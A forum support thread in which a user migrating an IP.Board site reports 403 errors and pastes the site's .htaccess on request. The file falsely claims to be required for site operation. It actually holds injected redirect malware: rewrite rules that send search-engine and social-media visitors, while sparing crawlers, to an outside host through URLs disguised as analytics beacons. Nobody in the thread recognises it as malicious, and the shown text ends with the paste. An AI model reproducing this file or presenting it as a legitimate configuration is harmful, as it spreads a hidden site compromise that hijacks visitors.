Invision Community 4: SEO, prepare for v5 and dormant account notifications By Matt Monday at 02:04 PM
Missing Lincs Posted October 17, 2015 Posted October 17, 2015 I'm taking over a existing site using IPB 3.1.4. The old site is licensed but the license is not active and no updates have been done for a while. I've followed the guide for moving servers and got as far as moving files and the SQL database, I've also updated conf_global.php Great so far, no errors but I can't access the site on the new server, I get error 403. Any suggestions where to start please? Forgot to add, I have a new license ready to use and also update the software when I get that far.
Makoto Posted October 17, 2015 Posted October 17, 2015 A 403 error could be a few things. It generally means either permissions are not set correctly on your IP.Board files, or it could also mean an error is occurring and a permission error is being encountered when trying to access the error page. How is your new server configured? Is it running Windows or Linux, and are you using a control panel such as cPanel? Can you please post the most recent error log entries from your web server? The default error log files are usually located at /var/log/apache2/error.log for Apache, or /var/log/nginx/error.log for Nginx.
Missing Lincs Posted October 17, 2015 Author Posted October 17, 2015 Hi Makoto, thanks for your reply. The control panel is 'Extend'. Error log is Quote coastguards24-7.co.uk [Sat Oct 17 10:07:31 2015] [error] [client 194.126.75.106:60835] script not found or unable to stat: /home/sites/coastguards24-7.co.uk/public_html/conf_global.php coastguards24-7.co.uk [Sat Oct 17 12:51:48 2015] [error] [client 194.126.75.106:42141] AH01276: Cannot serve directory /home/sites/coastguards24-7.co.uk/public_html/: No matching DirectoryIndex (index.cgi,index.pl,index.asp,index.html,index.html.var,index.shtml,index.php,index.php3,index.htm,default.htm,default.asp) found, and server-generated directory index forbidden by Options directive The new server is slightly different to the old in terms of where files are located. On the old there was a folder htdocs in the root, on the new I use the folder public.html with the files directly in it. There's also an access log if that's any use?
Makoto Posted October 17, 2015 Posted October 17, 2015 Is the path generated in the error messages the correct path to your web root? More specifically, does the referenced conf_global.php file exist where it is actually looking? The error could be generated because your paths are incorrect, or if not, it's probably the result of your file permissions being incorrectly set. Do you have SSH access to the server in question, or do you just use FTP for handling file transfers?
AndyF Posted October 17, 2015 Posted October 17, 2015 I don't (think) its this but have you changed the URL as well ? The old .htaccess file can cause odd issues if its not correct.
Missing Lincs Posted October 17, 2015 Author Posted October 17, 2015 I have changed URL, I edited the value board_url in conf_global.php. Should I edit htaccess ?
Makoto Posted October 17, 2015 Posted October 17, 2015 Can you post the contents of your .htaccess file here? Please paste the contents in a code box (use the <> icon at the top right hand corner of the editor). Is coastguards24-7.co.uk the old board URL?
Missing Lincs Posted October 17, 2015 Author Posted October 17, 2015 # >>> DO NOT MODIFY THIS FILE, IT IS REQUIRED FOR CORRECT SITE OPERATION <<< <IfModule prefork.c> RewriteEngine On RewriteCond %{REQUEST_METHOD} ^GET$ RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(tweet|twit|linkedin|instagram|facebook\.|myspace\.|bebo\.).*$ [NC,OR] RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(hi5\.|blogspot\.|friendfeed\.|friendster\.|google\.).*$ [NC,OR] RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.).*$ [NC,OR] RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.).*$ [NC,OR] RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(lycos\.|metacrawler\.|mail\.|pinterest|instagram).*$ [NC] RewriteCond %{HTTP_REFERER} !^.*(imgres).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|IRIX|Jakarta|JetBrains).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|macDN|Mediapartners|Megite|MetaProducts).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC] RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC] RewriteCond %{REMOTE_ADDR} !^66\.249.*$ [NC] RewriteCond %{REMOTE_ADDR} !^74\.125.*$ [NC] RewriteCond %{HTTP_COOKIE} !^.*zrZ.*$ [NC] RewriteCond %{HTTP_USER_AGENT} .*(Windows|Macintosh|iPad|iPhone|iPod|Android).* [NC] RewriteCond %{HTTPS} ^off$ RewriteRule .* - [E=zrZ:%{TIME_SEC}] RewriteRule .* - [E=RxJ:pennebaker.automotiveeventregistration.com] RewriteCond %{ENV:zrZ} 0 RewriteRule ^.* http://%{ENV:RxJ}/__utm.gif?utmwv=5.3.3&utms=21&utmn=1522843977&utmhn=bolaeropa1.kompas.com&utmcs=UTF-8&utmsr=1280x720&utmvp=1263x581&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=11.1\%20r102&utmdt=Liputan\%20Khusus\%20Piala\%20Eropa\%202012\%20-Gol\%20Balotelli\%2C\%20Persembahan\%20untuk\%20Ibu\%20Tersayang&utmhid=1102809163&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/read/xml/2012/06/29/10400099/Gol.Balotelli..Persembahan.untuk.Ibu.Tersayang&utmac=UA-3374285-21&utmcc=__utma\%3D201449346.1886482912.1339466572.1340875205.1340939381.17\%3B\%2B__utmz\%3D201449346.1340939381.17.16.utmcsr\%3Dbola.kompas.com\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/read/2012/06/29/06060595/Mereka.Cemburu.Melihat.Otot.Tubuhku\%3B&utmu=qAAAAAAAAAAAAAAAQ~ [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:11253:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 1 RewriteRule ^.* http://%{ENV:RxJ}/s?fs=0&nsivbblmean=133399.691&h=480&rt=8009.117&volume=100&len=2996.44&vid=XnLoXTXgEZEZMARZ1_8tsJTlf6TKCAOPC&lact=99112&et=682.159&nsiabblmin=16168.000&rendering=software&vr=1340870457656&decoding=software&ns=yt&nsiabblmax=16379.000&vh=240&sourceid=ys&hbd=4330908&bc=125833670&vw=320&st=641.853&q=\%E8\%88\%8C\%E5\%B0\%96\%E4\%B8\%8A\%E7\%9A\%84\%E4\%B8\%AD\%E5\%9B\%BD4&hbt=130.668&el=detailpage&plid=AATDg7uoLOnC8ctz&w=640&nsiabblmean=16373.256&hl=en_US&nsivbblmin=72406.000&ptk=youtube_multi&fexp=919104,901601,921602,919324,913542,907335,922600,919306,913547,907344,907217,912706,919316,910006,920704,924500,902518&md=1&nsivbblc=285&csipt=watch5&vq=small&sd=BADC23143MH1340870472456730&nsiabblc=285&hasstoryboard=1&nsivbblmax=194064.000&fmt=5&tpmt=122&sendtmp=1&docid=KQu39OO60As&cfps=25&vtmp=1&cr=ID&screenh=768&playerw=640&screenw=1024&playerh=390&scoville=1&mos=0&referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:11157:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 2 RewriteRule ^.* http://%{ENV:RxJ}/_xhr/ugccomments/?method=get_list&context_id=999ef384-efed-3746-8565-c268b25c36c7&0.18106665673617617&mode=list&show_form=yes&baseurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&&asset_title=J.K.\%20Rowling\%20dan\%20suaminya\%2C\%26nbsp\%3B\%26hellip\%3B&ugccmt_vita_type=photo&ugccmt_vita_img_url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ugccmt_vita_img_width=110&ugccmt_vita_img_height=88&ugccmt_vita_img_rights=anywhere&ugccmt_vita_photo_album=Selebritas\%20di\%20Wimbledon&ugccmt_vita_photo_album_url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:11974:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 3 RewriteRule ^.* http://%{ENV:RxJ}/getSegment.php?purl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&jsref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&rnd=1340285278794 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9671:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 4 RewriteRule ^.* http://%{ENV:RxJ}/router/?ishd=0&w=trafficList&ign=0&wn=1&cen=1&nv=0&inu=0&pvid=1341385579325-6818592762505002&pvnum=5&tats=2&fl=0&vid=2e51e8b34f45eb38a3c2b187d0f187274cd46715ccde0579&rn=0&lg=1&u=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&r=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&t=MELILEA\%20Wujudkan\%20KESEHATAN\%2C\%20KECANTIKAN\%20\%26\%20PASIF\%20INCOME\%20Bersama\%20MELILEA&sw=1280&sh=800&pid=0&wid=f17aebe5f77d1a4b&proid=0&fhst=&tft=3&wh=Live+Traffic+Feed&hl=0&hlnks=0&srefs=1&hbars=0&hfce=0&wne=10&msum=7a49daa5&gid=0&flt=1975&fv=1&tfen=1&flc=&lu=0&isIE=0&oldB=0&mgen=&fjv=2&rand=108908420&ww=300 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9029:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 5 RewriteRule ^.* http://%{ENV:RxJ}/b/ss/ahmhondacomprod/0/FAS-1.3/s11986025879159?[AQB]&ndh=1&t=19/5/2012\%2010:1:37\%202\%20\%2D420&ce=UTF\%2D8&ns=honda&pageName=PORTAL\%20HOME&cc=USD&ch=PORTAL&events=event1&v1=MILLION\%20MILE\%20JOE\%20BANNER&c26=HOME&v26=HOME&c27=DEFAULT&v27=DEFAULT&c37=PORTAL:HOME:DEFAULT:PORTAL\%20HOME&pe=lnk_o&pev1=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pev2=PORTAL:HOME:DEFAULT:MILLION\%20MILE\%20JOE\%20BANNER\%20DISPLAY&s=1280x768&[AEQ]? [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:11843:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 6 RewriteRule ^.* http://%{ENV:RxJ}/www/delivery/lg.php?bannerid=9997&campaignid=3089&zoneid=3&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=7919c10c3b [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:11271:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 7 RewriteRule ^.* http://%{ENV:RxJ}/pview?event=pview&fpc=d96b1f4-137eaa87da1-3bf81330-5931&sessionID=1340789196086.43504&sourceURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&hostname=www.mangahere.com&location=/manga/do_not_fight/c002/12.html&publisher=e47efe7d-147b-4731-ac42-9838ccdc52f2&shareHash=sthash.oyB4okyZ&incomingHash=&refDomain=www.mangahere.com&refQuery=manga/do_not_fight/c002/11.html&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sharURL=&source=share5x&title=Do\%20Not\%20Fight\%202\%20-\%20Read\%20Do\%20Not\%20Fight\%20Chapter\%202\%20Online\%20-\%20Page\%2012&ts1340789196088.0= [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9324:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 8 RewriteRule ^.* http://%{ENV:RxJ}/__utm.gif?utmwv=5.3.3&utms=76&utmn=850577631&utmhn=mobil.kapanlagi.com&utmcs=ISO-8859-1&utmsr=1366x768&utmvp=1349x674&utmsc=24-bit&utmul=id&utmje=1&utmfl=9.0\%20\%20r45&utmdt=KapanLagi.com:\%20Foto\%20No:\%205\%20-\%20Honda\%20Odyssey\%202002\%20Rp.\%20137.500.000\%20IN-1696774\%20Otosia.com&utmhid=1468400126&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/honda_odyssey_2_3_japan_in-1696774.html\%3Fimg\%3D5&utmac=UA-32725639-2&utmcc=__utma\%3D122331860.795201196.1327477948.1340753610.1340926171.56\%3B\%2B__utmz\%3D122331860.1339986923.51.15.utmcsr\%3Dkapanlagi.com\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/takeover.html\%3B&utmu=qB~ [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9488:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 9 RewriteRule ^.* http://%{ENV:RxJ}/s?rt=1571.470&nsiabblmean=16346.549&vid=XnLoXTXgEZEZMARZ1_8tsJTlf6TKCAOPC&lact=851922&et=1072.979&plid=AATEYUc2ddKWFnMx&h=481&st=1032.687&rendering=software&vr=1341822009453&nsiabblc=277&decoding=software&len=2460.8&ahoffset=30&vw=426&vh=240&nsidf=90&hbd=4223689&bc=49948037&ns=yt&hbt=162.899&el=detailpage&sourceid=ys&q=\%E6\%B5\%AE\%E6\%B2\%8904&volume=100&sd=BADC23143MH1341822004282352&hl=en_US&w=854&md=1&csipt=watch5&vq=small&bd=1280512&ptk=youtube_none&referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&bt=40.296&docid=8MBiqvElgWo&fmt=5&nsivbblmax=160478.000&fexp=919104,901601,921602,924700,913542,907335,922600,919306,919324,907344,907217,920706,919316,910006,920704,924500,912706,902518&tpmt=934&sendtmp=1&nsivbblmin=59198.000&cfps=28.957528957528957&vtmp=1&screenw=1024&screenh=768&playerw=854&nsivbblmean=116111.191&playerh=640&scoville=1&nsivbblc=277&cr=ID&mos=0&fs=1&nsiabblmax=16379.000&nsiabblmin=15958.000 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:10772:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 10 RewriteRule ^.* http://%{ENV:RxJ}/delivery/lg.php?bannerid=38171&campaignid=7630&zoneid=1905&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=2f6eb91ebe [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9480:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 11 RewriteRule ^.* http://%{ENV:RxJ}/_xhr/ugccomments/?method=get_list&context_id=eba976b3-6454-3718-aabc-ab37c22e5c72&0.04573528673597238&mode=list&show_form=yes&baseurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&&asset_title=T-ara\%20releasing\%20new\%20album\%26nbsp\%3B\%26hellip\%3B&ugccmt_vita_type=photo&ugccmt_vita_img_url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ugccmt_vita_img_width=110&ugccmt_vita_img_height=88&ugccmt_vita_img_rights=anywhere&ugccmt_vita_photo_album=T-ara\%E2\%80\%99s\%20Ham\%20Eun\%20Jung\%20Tweets\%20Photo\%20From\%20Indonesia&ugccmt_vita_photo_album_url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:10559:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 12 RewriteRule ^.* http://%{ENV:RxJ}/en/shared/templates/components/cspMscomNewsBand/Rss.ashx?u=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&_=1264611950860 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:10072:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 13 RewriteRule ^.* http://%{ENV:RxJ}/pview?event=pview&fpc=d96b1f4-137eaa87da1-3bf81330-3027&sessionID=1340262823429.26301&sourceURL=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&hostname=www.mangahere.com&location=/manga/bokura_no_himitsu_wo_kaihou_shiyou_ka/c000/18.html&publisher=e47efe7d-147b-4731-ac42-9838ccdc52f2&shareHash=sthash.9VMLr8AW&incomingHash=&refDomain=www.mangahere.com&refQuery=manga/bokura_no_himitsu_wo_kaihou_shiyou_ka/c000/17.html&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&sharURL=&source=share5x&title=Bokura\%20No\%20Himitsu\%20Wo\%20Kaihou\%20Shiyou\%20Ka\%200\%20-\%20Read\%20Bokura\%20No\%20Himitsu\%20Wo\%20Kaihou\%20Shiyou\%20Ka\%20Chapter\%200\%20Online\%20-\%20Page\%2018&ts1340262823432.0= [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:11903:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 14 RewriteRule ^.* http://%{ENV:RxJ}/s?md=1&plid=AATEoMsdpHMzBwJt&vid=CXh9sV91jWqW0TfFIlh1ah3d8S_J0q27R&rt=875.023&lact=858776&rendering=software&et=332.266&feature=related&st=326.56&vw=384&h=360&decoding=accelerated&uga=m37&hl=en_US&vh=288&tsphab=1&bc=40026406&el=detailpage&tspne=0&tspfdt=270&referrer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&fmt=34&w=480&sendtmp=1&vq=auto&bd=775066&sd=B6F5FF006HH1342094790390974&bt=40.064&cr=ID&nsivbblmin=12.000&len=364.831&nsivbblc=318&nsivbblmax=374011.000&hasstoryboard=1&volume=100&docid=emf4dmS4Ee4&vtmp=1&ns=yt&nsivbblmean=202223.129&tpmt=329&ptk=youtube_none&hbd=4306534&cfps=0&nsiabblmax=74207.000&screenw=1280&nsiabblmin=1316.000&screenh=800&sourceid=yw&playerw=640&nbe=1&nsiabblmean=40228.050&playerh=390&nsiabblc=318&scoville=1&hbt=127.374&pd=34.241&fexp=921602,914083,924700,913542,907335,922600,919306,919324,907344,907217,920706,919316,902518,924500,912706&mos=0&csipt=watch5&fs=0&sdetail=f:related\%2Crv:LwnNeRScI_8 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:11805:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 15 RewriteRule ^.* http://%{ENV:RxJ}/__utm.gif?utmwv=5.3.3&utms=4&utmn=184650450&utmhn=www.kejumooo.com&utmcs=UTF-8&utmsr=1024x768&utmvp=1007x559&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.0\%20r22&utmdt=Resep\%20KejuMooo\%20\%7C\%20Kejumooo&utmhid=552144156&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/aneka-resepmooo/resep-kejumooo/&utmac=UA-12938747-1&utmcc=__utma\%3D190714673.1637672577.1341468465.1341468465.1341468465.1\%3B\%2B__utmz\%3D190714673.1341468465.1.1.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Dkeju\%2520kraft\%3B&utmu=D~ [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9341:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 16 RewriteRule ^.* http://%{ENV:RxJ}/b/ss/lenovouspub,lenovowwpub/1/H.20.2/s92298991763050?AQB=1&pccr=true&vidn=25B0BA0F85012DBC-400001114024ABC5&&ndh=1&t=28/0/2010\%2012:22:30\%204\%20-60&vmt=4989C002&ce=UTF-8&ns=lenovo&pageName=us_en:products:desktops:ideacentre:q:home:features&g=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&r=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cc=USD&vvp=DFA\%231515899:v30\%3D\%5B\%5B\%22DFA-\%22\%2Blis\%2B\%22-\%22\%2Blip\%2B\%22-\%22\%2Blastimp\%2B\%22-\%22\%2Blastimptime\%2B\%22-\%22\%2Blcs\%2B\%22-\%22\%2Blcp\%2B\%22-\%22\%2Blastclk\%2B\%22-\%22\%2Blastclktime\%5D\%5D&ch=US\%20Public&server=shop.lenovo.com&events=event36&c1=US\%20Public\%20Shop&h1=Shop\%2CDesktops\%20\%26amp\%3B\%20all-in-ones\%2CIdeaCentre\%20desktops&c2=US\%20Public\%20Shop\%20:\%20Desktops\%20\%26amp\%3B\%20all-in-ones&c3=D\%3Dg&c4=US\%20Public\%20Shop\%20:\%20Desktops\%20\%26amp\%3B\%20all-in-ones\%20:\%20IdeaCentre\%20desktops&v4=D\%3Dv0&c5=US\%20Public\%20Shop\%20:\%20Desktops\%20\%26amp\%3B\%20all-in-ones\%20:\%20IdeaCentre\%20desktops\%20:\%20Q\%20Series:\%20Compact\%20or\%20mini&c7=Shop&c8=us:consumer&c10=New&v11=us:consumer&v12=US\%20Public\%20Shop&v22=D\%3Dv0&c29=en&c36=us&c47=D\%3DpageName&s=1440x900&c=32&j=1.7&v=N&k=Y&bw=1440&bh=715&p=Mozilla\%20Default\%20Plug-in\%3BgetPlusPlus\%20for\%20Adobe\%2016248\%3BAdobe\%20Acrobat\%3B2007\%20Microsoft\%20Office\%20system\%3BShockwave\%20Flash\%3BMicrosoft\%u00AE\%20DRM\%3BWindows\%20Media\%20Player\%20Plug-in\%20Dynamic\%20Link\%20Library\%3B&AQE=1 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9770:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 17 RewriteRule ^.* http://%{ENV:RxJ}/__utm.gif?utmwv=5.3.3&utms=2&utmn=44010502&utmhn=mediacdn.disqus.com&utme=8(component*package*forum*version*userType)9(embed*free*marksweb*houdini*not_logged_in)&utmcs=ISO-8859-1&utmsr=1024x768&utmvp=300x150&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.3\%20r181&utmhid=1293469919&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/1341348056/build/system/def.html&utmac=UA-1410476-6&utmcc=__utma\%3D40641725.2056047342.1341454831.1341454831.1341454831.1\%3B\%2B__utmz\%3D40641725.1341454831.1.1.utmcsr\%3Dallkpop.com\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/2012/05/miss-a-member-suzys-long-arms-whack-kim-sung-soo-in-the-face\%3B&utmu=qR~ [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:11981:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 18 RewriteRule ^.* http://%{ENV:RxJ}/b?c1=8&c2=6135404&c3=28&c4=13310&c10=3325558&ns__t=1342428274267&ns_c=ISO-8859-1&c8=&c7=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&c9=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:10896:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 19 RewriteRule ^.* http://%{ENV:RxJ}/__utm.gif?utmwv=5.3.2&utms=3&utmn=997459587&utmhn=www.blogger.com&utmcs=UTF-8&utmsr=1024x768&utmvp=520x275&utmsc=32-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=Blogger:\%20Refleksi\%20Kaki\%20-\%20Poskan\%20Komentar&utmhid=1692750796&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/comment-iframe.g\%3FblogID\%3D1217021651538040007\%26postID\%3D7719919084539477506&utmac=UA-18003-7&utmcc=__utma\%3D150635877.2146094011.1284528487.1340759105.1340875048.43\%3B\%2B__utmz\%3D150635877.1340875048.43.43.utmcsr\%3Drefleksi-kaki.blogspot.com\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/2010/12/titik-refleksi-kaki.html\%3B&utmu=q~ [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9056:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 20 RewriteRule ^.* http://%{ENV:RxJ}/delivery/lg.php?bannerid=36234&campaignid=7411&zoneid=1920&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=950baa3a72 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:10176:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 21 RewriteRule ^.* http://%{ENV:RxJ}/piwik/piwik.php?action_name=Sensus\%20Penduduk\%202010\%20-\%20Provinsi\%20Sulawesi\%20Barat&idsite=1&rec=1&r=991431&h=10&m=46&s=32&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&urlref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&_id=1fabea57a0c31b45&_idts=1340176540&_idvc=4&_idn=0&_refts=1340248181&_viewts=1340243325&_ref=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pdf=1&qt=1&realp=1&wma=1&dir=0&fla=1&java=0&gears=0&ag=1&res=1024x768&cookie=1 [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:10563:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 22 RewriteRule ^.* http://%{ENV:RxJ}/_xhr/ugccomments/?method=get_list&context_id=4928ff1f-f703-3937-9478-282a21068433&0.8473178492605365&mode=list&show_form=yes&baseurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&&asset_title=Matthew\%20Lewis&ugccmt_vita_type=photo&ugccmt_vita_img_url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&ugccmt_vita_img_width=110&ugccmt_vita_img_height=88&ugccmt_vita_img_rights=anywhere&ugccmt_vita_photo_album=Perubahan\%20Drastis\%20\%22Neville\%20Longbottom\%22&ugccmt_vita_photo_album_url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=zrZ:%{ENV:zrZ}:%{HTTP_HOST}:9238:/:0:HttpOnly] RewriteCond %{ENV:zrZ} 23 RewriteRule ^.* http://%{ENV:RxJ}/__utm.gif?utmwv=5.3.3&utms=1&utmn=1296848221&utmhn=bolaeropa1.kompas.com&utmcs=UTF-8&utmsr=1152x864&utmvp=1136x679&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=11.0\%20r1&utmdt=Liputan\%20Khusus\%20Piala\%20Eropa\%202012\%20-Empat\%20Pemain\%20Perancis\%20akan\%20Diinterogasi&utmhid=124171963&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/read/xml/2012/07/05/0312536/Empat.Pemain.Perancis.akan.Diinterogasi&utmac=UA-3374285-1&utmcc=__utma\%3D201449346.922487649.1340063116.1341275237.1341445298.11\%3B\%2B__utmz\%3D201449346.1341445298.11.11.utmcsr\%3Dkompas.com\%7Cutmccn\%3D(referral)\%7Cutmcmd\%3Dreferral\%7Cutmcct\%3D/\%3B&utmu=q~ 